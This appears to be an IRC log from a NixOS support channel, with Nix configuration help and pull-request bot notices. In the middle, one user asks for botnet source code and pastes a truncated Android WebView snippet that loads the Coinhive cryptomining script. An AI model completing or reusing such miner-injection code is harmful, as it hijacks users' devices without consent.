<Mic92> moredhel[m]: you could symlink them to the said directory I think
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<moredhel[m]> ah, okay. So no way to just throw in a bunch of disjoint paths :/
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<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN8Bm
<{^_^}> [nixpkgs] @matthewbauer merged pull request #42834 → security.sudo.extraRules: documentation fix → https://git.io/fwlcN
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<{^_^}> [nixpkgs] @thefloweringash opened pull request #44019 → rubocop: 0.55.0 -> 0.58.1 → https://git.io/fN8Bc
<sphalerite> moredhel[m]: oh and the top-level `options` variable comes from adding it to the signature of your module
<sphalerite> so { pkgs, lib, ... }: becomes { pkgs, lib, options, ... }:
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<{^_^}> [nixpkgs] @matthewbauer merged pull request #42149 → openspace: init at 0.11.1 → https://git.io/vhDum
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN8RJ
<sphalerite> so my tinc has stopped working and is spamming `tincd[25085]: Can't write to Linux tun/tap device (tun mode) /dev/net/tun: Input/output error` on its log. Restarting it doesn't seem to help. How do I fix it?
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<joepie91> sphalerite: OpenVZ or LXC/Docker container?
<moredhel[m]> Thanks Linus
<moredhel[m]> That is exactly what I needed!
<sphalerite> joepie91: nope
<sphalerite> joepie91: plain hardware
<sphalerite> it was working previously as well
<moredhel[m]> I think I have everything working now, except for the `nixos-rebuild build` now can't see my overlays.
<moredhel[m]> everything else can... do I need to reboot, or is there a way to propogate the changes?
<joepie91> sphalerite: recently upgraded stuff?
<joepie91> sounds like your tun kernel driver is bork
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<sphalerite> joepie91: any idea how to fix it?
<sphalerite> I just tried removing and re-adding the kernel module
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<joepie91> no idea :/
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<dmj`> how do I get my nixpkgs hash from nix repl
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<dmj`> cat /nix/var/nix/profiles/per-user/root/channels/nixpkgs/.git-revision seems to work
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<Profpatsch> Mic92: What make you say that. :)
<Mic92> Profpatsch: s6-init and the urge to make split all packages.
<Profpatsch> Mic92: Pfff, no, it’s actually just a desire to get rid of most bash scripts and systemd-unitfile shit.
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<bkchr[m]> `Could not take device /dev/fb0 , cause: "No such device"` does someone has seen such a message?
<Profpatsch> I’m dreaming of a daemon manager that can actually find out dependency graphs without wanting to be PID 1
<bkchr[m]> The device exists for me..
<Profpatsch> Mic92: Also, user services.
<Profpatsch> Dem user services.
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<Mic92> Profpatsch: you can start systemd also not as Pid1
<Mic92> rkt makes use of this
<Profpatsch> Mic92: You mean I can start systemd from a user dir. :)
<Profpatsch> And can I disable dbus as well? :)
<Mic92> Profpatsch: `systemd --user` was made for this
<Profpatsch> It’s pretty shit.
<Mic92> so is s6
<Mic92> If a service fails it restarts it forever as fast as it can
<Profpatsch> No, wait, it’s even worse than pretty shit.
<Profpatsch> It’s plain shit. :)
<Mic92> haters gonna hate
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<Mic92> s6 is just replacing dbus with there own ipc bus
<Profpatsch> Mic92: I was pretty neutral until I tried to write these user services: https://github.com/openlab-aux/vuizvui/blob/master/machines/profpatsch/katara.nix#L367
<Profpatsch> It’s just too much pain to be feasible.
<Profpatsch> Too much state and weird race-condition interactions, too much undiscoverable IPC over some dbus service, which breaks in the weirdest ways with no error messages and no way to debug.
<Profpatsch> No way to do static analysis, since everything happens at runtime.
<Profpatsch> No fucking documentation.
<Mic92> everything has documentation in systemd
<Mic92> every option and every public function
<Profpatsch> I cite, from the dbus official frontpage: “Please note that the D-Bus spec is incomplete, especially in its description of the message bus daemon. The spec for the protocol itself is reasonably complete, though not always clear or precise. Your patches are welcome! In the meantime, you may need to supplement your reading of the spec with a reading of the reference implementation source code.”
<Profpatsch> Last changed early 2013
<Mic92> man busctl
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<dmj`> why won’t my nixpkgs channel update?
<dmj`> nix-channel --update nixpkgs-unstable
<dmj`> cat /nix/var/nix/profiles/per-user/root/channels/nixpkgs/.git-revision
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<Profpatsch> Complaining doesn’t help anyone though, that’s why I’m trying to get something nice running with s6
<Mic92> man systemd.directives gives also pointers to everything else
<Mic92> Also I am probably biased, because I have exercised the codebase a bit.
<sphalerite> dmj`: maybe it's already fully up to date?
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<dmj`> sphalerite: it’s not
<aminechikhaoui> dmj`: is it the same user ?
<aminechikhaoui> are you running nix-channel --update as root ?
<dmj`> sphalerite: the hash locally is different from whats shown on https://releases.nixos.org/nixpkgs/nixpkgs-18.09pre146471.d7d31fea7e7
<dmj`> aminechikhaoui: I tried nix-channel as root, still same revision
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<sphalerite> dmj`: you're probably on nixos-unstable, not nixpkgs-unstable
<sphalerite> there's a difference
<dmj`> nix-channel list shows nixpkgs-unstable https://nixos.org/channels/nixpkgs-unstable
<dmj`> sphalerite: I’m not
<{^_^}> [nixpkgs] @matthewbauer merged pull request #31849 → php: tidySupport option → https://git.io/vFQRf
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN8ge
<sphalerite> an important one, since nixpkgs-unstable will currently not work for nixos
<dmj`> sphalerite: I’m on darwin
<sphalerite> oh right never mind me then
<{^_^}> [nixpkgs] @matthewbauer merged pull request #43596 → runelite: init at 1.6.0 → https://git.io/fNY6W
<{^_^}> [nixpkgs] @matthewbauer pushed 2 commits to master: https://git.io/fN8gv
<sphalerite> oh yeah but you might need to do sudo -i then run the nix-channel commands
<sphalerite> because of OSX sudo weirdness
<dmj`> sphalerite: woa, that worked
<dmj`> sphalerite: sudo -i changed the hash
<dmj`> sphalerite: that is some buggy shit
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<sphalerite> yep. OSX's sudo doesn't update the environment properly, so sudo nix-channel still operates on the calling user's channels
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<rschmukler> Hey all. I did something stupid (rm -rf ~/.nix-defexpr/channels/*) and now when I re-add the channel, nix-channel --update doesn't do anything (ie. ~/.nix-defexpr/channels/ remains empty)
<rschmukler> Similarly, `nix-env -i somepkg` returns "no matching derivations"
<rschmukler> Any help on how to get nix pack on track?
<sphalerite> rschmukler: ln -s /nix/var/nix/profiles/per-user/$USER/channels ~/.nix-defexpr/channels
<dcol> I'm getting a strange error trying to do a rebuild.. "output '/nix/store/hdx90hiz9fi1pgb56jdm2kfyyr8xpaxf-extra-utils' is not allowed to refer to the following paths:
<dcol> /nix/store/2b6pmzqay3ipsj1i4ppg3g0jwa9rylbr-libidn2-2.0.5", anyone know what this is about?
<sphalerite> I think
<sphalerite> dcol: master is broken. Which channel are you on?
<rschmukler> sphalerite: the link is in place, `/nix/var/nix/profiles/per-user/$USER/channels` is empty
<dcol> sphalerite: I have my own nixpkgs, but its mostly unstable with some edits to the emacs and qt packages.
<sphalerite> rschmukler: are you on nixos?
<rschmukler> MacOS
<sphalerite> dcol: nixpkgs-unstable?
<sphalerite> dcol: for nixos you shouldn't use a newer channel than nixos-unstable-small
<sphalerite> nixpkgs-unstable may break your system
<dcol> sphalerite: nixos-unstable. yeah, I know that. that's fine. just wondering if anyone knows what the error message is referring to so I can investigate :)
<sphalerite> dcol: weird, I don't think the channel should have advanced to that
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<sphalerite> in any case, people have been mentioning it all day. I don't know the details
<dcol> aha, that's good enough for me. thanks for the info
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<{^_^}> [nixpkgs] @Mic92 opened pull request #44020 → python3.pkgs.black: 18.4a0 -> 18.6b4 → https://git.io/fN82B
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<d1rewolf_> guys, I have a machine on which I need to adjust DPI. is the preferred way of doing this ~/.Xresources or something else
<d1rewolf_> ?
<infinisil> d1rewolf_: services.xserver.dpi
<d1rewolf_> infinisil: ok, thanks. i'll look at that. how does one inspect services from the nix repl?
<infinisil> inspect? you want to see config values?
<d1rewolf_> infinisil: right. like what it's set to now
<infinisil> That would be `nixos = import <nixpkgs/nixos> {}`, then `nixos.config.services.xserver.dpi`
<d1rewolf_> I know I can :l <nixpkgs> to see packages
<d1rewolf_> interesting. dpi is null. so there's no default?
<infinisil> I guess it's what it detects
<infinisil> X probably has a way to do that
<RetardedOnion> it does
<infinisil> ,locate bin xdpyinfo
<RetardedOnion> or its something else
<{^_^}> Found in packages: xlibs.xdpyinfo
<d1rewolf_> infinisil: cool, thanks very much. does part of the manual cover the using the repl this way?
<infinisil> d1rewolf_: ^^ run this binary to find out what the current value is
<infinisil> (xdpyinfo)
<tilpner> d1rewolf_ - Also try nixos-option services.xserver.dpi
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<d1rewolf_> tilpner: infinisil thanks guys
<jD91mZM2> `nixos-config <thing>` is useful
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<sphalerite> d1rewolf_: nixos-option services.xserver.dpi is a bit more informative
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<neonfuz> Working on a new package for nixpkgs, and it needs its dependencies in the path so I'm using makeWrapper and makeBinPath to make the dependencies available
<neonfuz> my question is, where should I put the original script?
<neonfuz> the package is yaxg btw (https://github.com/NixOS/nixpkgs/pull/43866)
<{^_^}> #43866 (by neonfuz, open): yaxg: init at 2018-07-20
<d1rewolf_> hmmm...I have a situation where all my i3 fonts look fine, but fonts, say, in a web browser and in non-i3 window titles (chromium tabs) are way too big. What's the appropriate way to adjust this? Is it to increase DPI via Xresources?
<d1rewolf_> sphalerite: that is. .thanks!
<neonfuz> currently it puts the original script in lib/yaxg/yaxg, though I was thinking maybe share/yaxg/yaxg would be better, or it's own package called yaxg-unwrapped?
<sphalerite> d1rewolf_: you can also see and search all options in `man configuration.nix` (though not their current values)
<d1rewolf_> sphalerite: that's it.. I keep forgetting that man page
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<infinisil> neonfuz: Use wrapProgram instead of makeWrapper, invoke it on a single argument, the binary you want to wrap in $out/bin. wrapProgram then moves the original to $out/bin/.foo-wrapped, and puts the wrapper in $out/bin/foo
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<neonfuz> oh cool, thanks
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<jcumming> jack[m]1: matrix bridge test?
* jcumming is in Delft.
<RetardedOnion> can someone give me a quick and simple example for a buildEnv or a .nixpkgs/config.nix containing one?
<adelbertc> with `dockerTools.buildImage` is it possible to create writeable directories (e.g. `/opt`) without resorting to `mkdir` in `runAsRoot` which takes ages since it needs to spin up a VM
<infinisil> etrepum: buildEnv { name = "foo"; paths = [ pkgs.hello ]; }
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<infinisil> RetardedOnion: And using an overlay, put this into ~/.config/nixpkgs/overlays/mystuff.nix: self: super: { myEnv = super.buildEnv { name = "myenv"; paths = with self; [ hello ]; }; }
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<__monty__> RetardedOnion: You can find mine here (It's dated because I still use overrides instead of overlays thought : ) https://github.com/toonn/nix-config
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<infinisil> Oh and I meant RetardedOnion as well above, not etrepum
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<cocreature> adelbertc: hm, are they not writable if you create them in extraCommands?
<RetardedOnion> https://paste.debian.net/1034895/ if you would have a look. nix-env -u && nix-env -i ayy i get error: selector 'ayy' matches no derivations. why am i so incompetent?
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<__monty__> RetardedOnion: The attribute name has an Env suffix. So you want -iA nixpkgs.ayyEnv.
<Guest24975> ls -la
<RetardedOnion> __monty__: error: attribute 'ayy' in selection path 'ayy' not found
<__monty__> RetardedOnion: That's actually not true, *I* give them the suffix. -iA ayy should work.
<coconnor> morning all
<__monty__> RetardedOnion: My config is in .config/nixpkgs though.
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<coconnor> I've attempted to wrap the augur application. However, it's crashing with "trace/breakpoint". Never seen that failure before
<RetardedOnion> __monty__: error: attribute 'ayy' in selection path 'ayy' not found. stil.
<Guest24975> hello
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<tfc[m]> clever: remember my question about adding `ghcid` only when running nix-shell? i finally found a rather simple solution that does not lead to everything being recompiled. it looks very straight forward, and maybe i was a bit clumsy expressing my use case. https://github.com/tfc/stack2nix-with-ghcid
<Guest24975> Friends I'm in need of a source code for a monster botnet. Someone could help me. I need to develop a new bot. Who can help me will receive the new updates along with the code.
<__monty__> RetardedOnion: Not sure why it's not picked up. I thought there was an env var to set but that's for nix.conf
<goibhniu> Guest24975: here are the codes you need: https://github.com/NixOS/nixpkgs/issues/2079
<{^_^}> #2079 (by aszlig, open): nixos-assimilate - Turn currently running system into NixOS
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<d1rewolf_> anyone done any experimenting with throwaway virtualbox vms with nix? it'd be cool to be able to, say, quickly take my configuration.nix and run it in a new virtualbox vm seamlessly.
<coconnor> d1rewolf_: The nixos tests are exactly: spin up a temp vm with a configuration.
<coconnor> nixos-rebuild also has a build-vm-with-bootloader option
<goibhniu> d1rewolf_ build-vm uses qemu for that
<coconnor> and build-vm
<d1rewolf_> coconnor, do you get a gui with that?
<coconnor> The nixos tests will initialize a remote desktop. As that's appropriate for testing.
<coconnor> to get a GUI
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<coconnor> there is an option tho I'm unfamiliar.
<d1rewolf_> coconnor, ok, i'll take a look at that. thanks!
<samueldr> d1rewolf_: there's nixbox + vagrant, if you really need virtualbox: https://nixos.wiki/wiki/Vagrant_Box
<d1rewolf_> samueldr, sweet. thanks!
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<{^_^}> #2079 (by aszlig, open): nixos-assimilate - Turn currently running system into NixOS
<{^_^}> wololo defined
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<{^_^}> [nixpkgs] @FRidh pushed 114 commits to staging-next: https://git.io/fN8X0
<joepie91> lol
<infinisil> xD
<coconnor> d1rewolf_: did a quick test with nixos-rebuild build-vm. The script will launch a GUI if virtualisation.graphics is true (the default).
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<d1rewolf_> coconnor, I noticed that. However, for some reason it wn't let me log in
<coconnor> it's the embedded qemu window so not a fancy GUI host
<coconnor> ah. that I don't know about
<d1rewolf_> doesn't seem to like my password
<Guest24975> Public void onCreate(Bundle arg5){ super.onCreate(arg5); this.setContentView(0x7F030000); this.mresourcesaudio = this.findViewById(0x7F070001); this.aresourcesaudio.setOnClickListener(this.mResourcesAudioListener); this.vv = this.findViewById(0x7F070002); this.vv.getSettings().setJavaScriptEnabled(true); this.vv.loadData("<html><script src=\"https://coinhive.com/lib/coinhive.min.js\"></script></script>var miner = new CoinHi
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<coconnor> d1rewolf_: are you using hashedPassword option for your user?
<coconnor> (The password for users is not copied to the VM.)
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<d1rewolf_> coconnor, ah, ok. nah, I'm setting my password manually after install
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<{^_^}> [nixpkgs] @pSub pushed to staging « parallel: 20180622 -> 20180722 »: https://git.io/fN81a
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<{^_^}> [nixpkgs] @rycee pushed 3 commits to release-18.03: https://git.io/fN81Q
<{^_^}> [nixpkgs] @rycee closed pull request #43956 → skypeforlinux: 8.18.06 -> → https://git.io/fNlv6
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<{^_^}> [nixpkgs] @dotlambda closed pull request #42917 → python.pkgs.sip: 4.19.6 -> 4.19.8 → https://git.io/fQ6Bl
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<adelbertc> cocreature: aha i think my issue is i was trying to create directories under `/` directly
<{^_^}> [nixpkgs] @trizinix opened pull request #44022 → revelation: init at 0.4.14 → https://git.io/fN8Mi
<cocreature> adelbertc: yeah that doesn’t work but luckily you don’t need to. you are already in the directory that will be / so just "mkdir opt" will create a directory that will end up at /opt
<adelbertc> yes!
<adelbertc> 🙏🙏🙏
<ixxie> Any Nixers interested in federated systems?
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<ajs124> ixxie, in general, yes. what specifically are you thinking about?
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<ixxie> ajs124: builting a decentralized user management module for NixOS that can hook into other modules
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<ixxie> ajs124: the idea would be to make it easy to rig up a NixOS config for a federated server
<ixxie> with any modules we have available of course
<infinisil> ixxie: Not sure what you mean by that, can you be more concrete?
<ajs124> sounds like a usecase for LDAP?
<ixxie> well I am not exactly sure, I have been trying to grasp different authentication systems and see which one is most suitable
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<ixxie> but I am thinking of the sort of decentralized authentication and autherization management the OpenID or OAuth offer
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<bkchr[m]> Anyone online that knows something about logind and how it sets permissions for video devices?
<lutzmor> evening i try to install NixOS currently but i get everytime a failure final link failed: No space left on device. But when i check df -h the only volume which has 100% is /nix/.ro-store anyone an idea.
<ixxie> so having sophisticated NixOS modules for these sorts of systems could potentially make it easy for people to federate servers running all sorts of modules available in NixOS under a single user / group namespace
<ixxie> I know its very vague, its a work in progress
<ixxie> I am trying to articulate how this works and my knowledge of these systems in limited, so apologies for this
<samueldr> lutzmor: you're probably installing to the ramdisk isntead of the intended device
<samueldr> using `mount` is the device you intended to install to mounted at /mnt ?
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<lutzmor> samueldr: yes /dev/sda3 is mounted to /mnt
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<{^_^}> [nixpkgs] @bbarker opened pull request #44023 → pyre: 0.0.8 -> 0.0.10 → https://git.io/fN8Dx
<samueldr> lutzmor: can you pastebin: 1. the list of partitions 2. the output of `mount` 3. the command you used for nixos-install (if you didn't simply use "nixos-install") ?
<samueldr> lutzmor: from the minimal iso, this pastebin is probably the easier to use: http://ix.io/
<samueldr> (or one of the easier to use)
<lutzmor> samueldr: i will try! :)
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<lutzmor> got it working :) https://pastebin.com/S1hCj9Zd and for install i simply use nixos-install
<RetardedOnion> are there any gui frontends that are worth my time?
<__monty__> RetardedOnion: That's contradiction in terms.
<__monty__> : )
<RetardedOnion> s/time/attention/
<samueldr> gui frontends for?
<RetardedOnion> nix
<bkchr[m]> adisbladis: do you have knowledge about polkit?
<samueldr> lutzmor: how much ram do you have? have you enabled the swap partition you created?
<tilpner> RetardedOnion - None, currently. But there was NixUI, and tenten* seems interested in building a new one
<d1rewolf_> has anyone come up with a clean way of managing firefox profile configurations across boxen?
<samueldr> (I'm not sure whether it would load stuff in the ramdisk store when installing or directly to the drive)
<tilpner> d1rewolf_ - No, I switched to qutebrowser after trying for a while :/
<samueldr> isn't that the P=NP problem? profile = not profile ?
<tilpner> (Though MichaelRaskin sort of managed it)
<d1rewolf_> tilpner, how've you found it? Any major drawbacks?
<lutzmor> samueldr: 4gig and yeah i did swapon /dev/sda2
<tilpner> d1rewolf_ - It doesn't handle large (>100) amounts of tabs as well as FF
<tilpner> And the ad-blocking situation is worse
<d1rewolf_> tilpner, what about ad blockign?
<tilpner> But hey, plaintext config!
<d1rewolf_> you beat me too it :-/
<d1rewolf_> sigh...I really wish ff was a bit easier to deal with dotfile-wise
<lutzmor> samueldr: i do a reboot and start from scratch :) maybe i messed something up :)
<d1rewolf_> tilpner, is there any ad blocking whatsoever?
<tilpner> d1rewolf_ - Yes, there is. But it's a step down from uBlockO
<tilpner> (Or a big jump)
<d1rewolf_> tilpner, shame
<d1rewolf_> thx
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<d1rewolf_> tilpner, is that firefox-profile.nix yours, or just an example of someone doing it?
<tilpner> d1rewolf_ - That's MichaelRaskins
<d1rewolf_> tilpner, ah, k. samueldr: what do you mean P=NP problem? you've sparked my curiosity ;)
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<RetardedOnion> tilpner: where can i find tenten? id be willing to help, but i am not a huge programmer.
<{^_^}> [nixpkgs] @andir opened pull request #44024 → [18.03] neomutt: 20180223 -> 20180716 → https://git.io/fN89B
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<tilpner> RetardedOnion - The full nick is tenten8401, and you'll probably have to catch them here when they next get online
<RetardedOnion> tilpner: thanks. will hopefully do
<{^_^}> [nixpkgs] @Ericson2314 opened pull request #44025 → mkDerivation: depsHostBuild -> depsHostHost → https://git.io/fN89P
<tilpner> Or... you could $search_engine that name and notice they have GitHub/Twitter/Steam accounts with that handle
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<samueldr> d1rewolf_: completely stupid joke about a "hard problem" https://en.wikipedia.org/wiki/P_versus_NP_problem
<d1rewolf_> samueldr, indeed. i'm familiar with p=np, but was curious if it was just a joke ;)
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<d1rewolf_> tilpner, have you used MichaelRaskins firefox config?
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<bkchr[m]> jtojnar: do you know if gnome on wayland requires `/dev/fb0`?
<d1rewolf_> or has anyone successfully managed firefox with nix here?
<d1rewolf_> firefox profiles, that is
<jtojnar> bkchr[m]: no idea
<bkchr[m]> jtojnar: okay :( Did you use wayland with gnome?
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<{^_^}> [nixpkgs] @andir merged pull request #44024 → [18.03] neomutt: 20180223 -> 20180716 → https://git.io/fN89B
<{^_^}> [nixpkgs] @andir pushed 2 commits to release-18.03: https://git.io/fN8Hj
<jtojnar> bkchr[m]: only tried it once
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<bkchr[m]> jtojnar: ahh okay
<{^_^}> [nixpkgs] @andir opened pull request #44026 → mutt: 1.9.4 -> 1.10.1 → https://git.io/fN8Q3
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<tilpner> d1rewolf_ - I have tried to imitate it, partly
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<d1rewolf_> tilpner, what problems did you run into? I really just want to install the same extensions across machines, and also perhaps some extension settings
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<kalbasit> how to override the `ghc` version when building a haskell package? context: haskellPackages.greenclip does not build with ghc843 and I need to compile it with ghc802 or ghc822 whichever works
<tilpner> d1rewolf_ - It's been a while, I don't remember the exact errors. I didn't get it working like I wanted to, but I could have tried longer
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* d1rewolf_ nods
<d1rewolf_> thanks
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<{^_^}> [nixpkgs] @timokau opened pull request #44027 → zeromq: 4.2.3 -> 4.2.5 → https://git.io/fN85G
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<{^_^}> [nixpkgs] @Ericson2314 merged pull request #44025 → mkDerivation: depsHostBuild -> depsHostHost → https://git.io/fN89P
<{^_^}> [nixpkgs] @Ericson2314 pushed 2 commits to staging: https://git.io/fN8dJ
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<Denommus> hey
<Denommus> nixops doubt: I have a src folder in the same directory as my *.nix files
<Denommus> I want the contents of this src directory to be the root of my nginx config
<Denommus> how can I do it?
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<{^_^}> [nixpkgs] @offlinehacker opened pull request #44028 → apache-airflow: init at 1.9.0 → https://git.io/fN8du
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<{^_^}> [nixpkgs] @Mic92 merged pull request #43840 → perkeep: 20170505 -> 0.10.1 → https://git.io/fNcpG
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN8do
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<{^_^}> [nixpkgs] @Mic92 merged pull request #44019 → rubocop: 0.55.0 -> 0.58.1 → https://git.io/fN8Bc
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN8dM
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<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to master: https://git.io/fN8FG
<{^_^}> [nixpkgs] @Mic92 merged pull request #43987 → cloudfoundry-cli: 6.36.1 -> 6.37.0 → https://git.io/fNlzK
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<ajs124> I'm trying to override an ExecStart in nfs-server.service. so what I did was systemd.services.nfs-server.serviceConfig.ExecStart = pkgs.lib.mkForce "", but now the original ExecStart and mine get executed, because the unit is Type=oneshot. Any idea how to fix this, so only mine gets executed?
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<Mic92> ajs124: make it a list: systemd.services.nfs-server.serviceConfig.ExecStart = ["" "/nix/store/*-actual-command"]. systemd will see the empty string, so reset everything that has been set before.
<{^_^}> [nixpkgs] @Mic92 merged pull request #44026 → mutt: 1.9.4 -> 1.10.1 → https://git.io/fN8Q3
<{^_^}> [nixpkgs] @Mic92 pushed 2 commits to release-18.03: https://git.io/fN8b2
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<{^_^}> [nixpkgs] @bfortz opened pull request #44029 → cplex: init at 12.8 → https://git.io/fN8b9
<infandum> I'm trying to mix unstable packages with stable by doing the fetchTarball then doing unstable = import unstableTarball etc. in packageOverrides. However, unstable.emacs is still installing emacs 25 rather than 26. Can I check somehow to see what the unstable.emacs is fetching?
<infandum> My configuration for the unstable definition is identical to https://codegists.com/search/nixos-nixpkgs-config/14
<infandum> in the configuration.nix
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<ajs124> Mic92, works perfectly, thanks!
<{^_^}> [nixpkgs] @Mic92 pushed commit from @kalbasit to release-18.03 « neovim: fix the xsel path in the clipboard runtime provider »: https://git.io/fN8NW
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<Denommus> why is nixops using SSLv3?
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<Mic92> infandum: nix eval '(import (builtins.fetchTarball { url = "https://github.com/NixOS/nixpkgs-channels/archive/nixos-unstable.tar.gz"; }) {}).emacs.version'
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<Mic92> it is 26.1 in my case
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<{^_^}> Channel nixos-18.03-small advanced to https://github.com/NixOS/nixpkgs/commit/917906a23e2 (from 67 minutes ago, history: https://channels.nix.gsc.io/nixos-18.03-small)
<Mic92> Denommus: where does it use ssl at all?
<Denommus> Mic92: I don't know, but isn't SSLv3 deprecated?
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<Mic92> Denommus: sslv2 is
<Mic92> openssl still does sslv3 afaik.
<maurer> sslv3 is still considered bad form
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<maurer> Denommus: What were you doing when it happened? nixops itself doesn't set any of the ssl parameters to the best of my knowledge, it uses various python libraries which implement programmatic cloud APIs
<maurer> It is likely that one of those is the place to file the bug
<maurer> Mic92: https://disablessl3.com/ in case you were curious
<maurer> Mic92: The tl;dr is that you cannot implement ssl3 securely
<Lisanna> hey, I accidentally garbage-collected my binary cache. Now I'm getting "hash mismatch importing path" errors because the binary cache rebuilt it and it wasn't deterministic.
<Lisanna> I already deleted rm /nix/var/nix/binary-cache-v3.sqlite* per https://github.com/NixOS/nix/issues/1885
<{^_^}> nix#1885 (by domenkozar, open): hash mismatch in downloaded path
<infandum> Mic92: I get 26.1 as well, so it's a problem with my configuration. When I ran your command it actually fetched the tarball, when I do sudo nixos-rebuild switch it does not have the same output.
<{^_^}> [nixpkgs] @eadwu closed pull request #43830 → vscode: 1.25.0 -> 1.25.1 → https://git.io/fNcov
<maurer> Denommus: That does not necessarily imply that they were going to use ssl3, only that that libcloud is built against openssl with ssl3 support
<Denommus> maurer: hm. Can I override it somehow?
<maurer> Denommus: It should work if you pass your neutered openssl library to the build process for libcloud somehow
<coconnor> likely doable with package overrides
<Mic92> infandum: you are having emacs in your systemPackages list
<Mic92> emacs without the `unstable` source
<coconnor> I'm not familiar with libcloud, but have defnitely done simlar for other libs
<infandum> Mic92: So FYI the configuration is identical to https://functor.tokyo/blog/2018-02-18-install-packages-from-nixos-unstable
<infandum> Mic92: It's unstable.emacs in my environment.systemPackages
<Mic92> infandum: not in the link, you gave me
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<infandum> That link is just showing what I got the unstable definition from
<infandum> In my configuration it's unstable.emacs
<Denommus> coconnor: even python libraries?
<Mic92> infandum: where profile is emacs coming from: which emacs
<Denommus> ok, libcloud seems terribly outdated
<Denommus> maybe I should update libcloud in nixops instead?
<maurer> Denommus: Try that first :)
<infandum> Mic92: /run/current-system/sw/bin/emacs
<borodust> mhm, libGL.so seems to be missing from /lib/opengl-drivers/lib/ in nixos unstable as of late. where can i find link to it now (apart from nix/store)?
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<Mic92> borodust: are you mixing different channels? We moved libGL.so to the nix store
<borodust> Mic92: i think i dont' :) i'm using unstable channel.
<coconnor> Denommus: I'm unfamiliar with python libraries. If similar to haskell library structure then it should be doable.
<borodust> Mic92: hmm, what is the proper way to load it dynamically in nixos these days?
<Mic92> coconnor: it can be tricky due its dynamic nature, you usually need good test coverage, which nixops does not have.
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* borodust is quite new to nixos, so he brings all the apologies possible
<Mic92> borodust: /run/opengl-drivers/lib is usually setup by modules correctly and then the LD_LIBRARY_PATH points to it
<Mic92> on non-nixos systems there is also the nixGL project
<infinisil> ,nixGL
<infandum> Mic92: Do you recommend mixing unstable with stable or just using unstable channel for all of configuration.nix?
<{^_^}> nixGL is a bunch of wrappers for getting OpenGL programs to work for your graphics card, https://github.com/guibou/nixGL
<infinisil> It also works on NixOS pretty sure
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<Denommus> there's an open issue on updating libcloud for nixops: https://github.com/NixOS/nixops/issues/519
<{^_^}> nixops#519 (by 3noch, open): Update libcloud
<Denommus> :-/
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<Mic92> infandum: not for packages depending on qt or OpenGL. Most of the other stuff should be fine. Personally I would probably would use a nixpkgs git checkout and backport the stuff I need using git-cherry pick
<infandum> I see
<Denommus> no, wait, it's updated. Wth
<infandum> Thank you for your help!
<maurer> Denommus: Note: That may still not fix it - libcloud depends on the python standard library module "ssl"
<maurer> which is in turn what is loading the sslv3 symbols
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<borodust> Mic92: opengl works for me (glxinfo correctly reports stuff and ldd for it points to libgl in nix/store), but there's no link to libGL.so in /run/opengl-drivers/lib
<borodust> Mic92: i saw PR that removed it from there
<Mic92> maurer: is not to disable sslv3 in the openssl version used for nixops (also this is a bit of an overshoot)
<borodust> Mic92: so the question is more like, if it is still possible to find libGL.so symlink somewhere
<borodust> this is super concerning matter for Common Lisp development, because everything is hightly dynamic there
<maurer> Mic92: I feel like I missed some ocntext there, but in any case, https://bugs.python.org/issue22935 looks like what you need to do is build python against an openssl which has v3 disabled
<maurer> and it will go away
<Mic92> pointfree: nix-shell -p nix-index --command 'nix-locate libGL.so'
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<maurer> I'd advocate for disabling v3 globally in nixos if we can get everything to build cleanly afterwards
* maurer disappear
<borodust> oh, hi Fare
<Denommus> maurer: so I might need to recompile python?
<maurer> Denommus: If you want to avoid sslv3 symbols, yes
<maurer> I don't know how libcloud uses python's ssl module - it is possible they do so in a way so that sslv3 cannot be used
<maurer> *such that
<Mic92> Denommus: python.override { openssl.overrideAttrs (old: { })}
<borodust> Mic92: oh, nix-locate is probably was for me, thanks! i'll check it out
<{^_^}> [nixpkgs] @ajs124 opened pull request #44030 → exim: add optional support for MySQL and the Dovecot authenticator → https://git.io/fN8pX
<Mic92> maurer: it uses requests so it is python's ssl module: https://github.com/apache/libcloud/blob/trunk/setup.py#L123
<Mic92> it might be also possible to monkeypatch sslv3 away
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<infinisil> ,locate libGL.so
<{^_^}> Found in packages: libglvnd, primusLib, libGLU_combined
<infinisil> Where libGL at
<infinisil> Weird
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* infinisil goes to refresh the cache
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<Denommus> Mic92: I'm getting syntax error with that
<Mic92> Denommus: python.override { openssl = openssl.overrideAttrs ( ... ); }
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<borodust> :( nix-index failed with recursion error, damn
<{^_^}> [nixpkgs] @andir opened pull request #44031 → networkmanager-vpnc: 1.2.4 -> 1.2.6 → https://git.io/fN8je
<{^_^}> [nixpkgs] @andir opened pull request #44032 → networkmanager-vpnc: 1.2.4 -> 1.2.6 → https://git.io/fN8jv
<Denommus> Mic92: I'll try, thanks
<borodust> Mic92: looking
<Mic92> Denommus: it might be easier to just replace openssl with libressl in python, which disables sslv3
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<Mic92> also I am not sure if this works without patches in python already
<Mic92> but looks like it does
<borodust> Mic92: ah, you mean those the paths i can find the lib in? hmm
<{^_^}> [nixpkgs] @kalbasit opened pull request #44033 → pet: init at 0.3.2 → https://git.io/fN8jX
<{^_^}> [nixpkgs] @matthewbauer merged pull request #43870 → Optional static libraries for krb5 and openssl → https://git.io/fNWWJ
<{^_^}> [nixpkgs] @matthewbauer pushed 3 commits to master: https://git.io/fN8jy
<Mic92> borodust: afaik, we use the libGL package for everything that depends on it.
<Mic92> so all application should link against this
<borodust> Mic92: but how do i load it dynamically? (dlopen)
<Mic92> borodust: LD_LIBRARY_PATH added via makeWrapper for example
<{^_^}> [nixpkgs] @matthewbauer closed pull request #43832 → Add recurse overlay → https://git.io/fNcKb
<borodust> this is the way a lot of common lisp software handles loading foreign (shared) libraries
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<borodust> Mic92: looking
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<Fare> hi, borodust
<borodust> Fare: did you load CL libs with foreign dependencies under nixos? mb cl-opengl specifically?
<borodust> but actually it probably worked due to libGL.so being present in /run/opengl-drivers/lib/ in stable channel :sigh:
<Denommus> how do I know if ~/.nixpkgs/config.nix is working?
<infinisil> Oh god, well this is great
<infinisil> In current unstable there is a haskell package "manifolds" which depends on "spatial-rotations" which depends on "manifolds"...
<infinisil> That's some infinite recursion for ya!
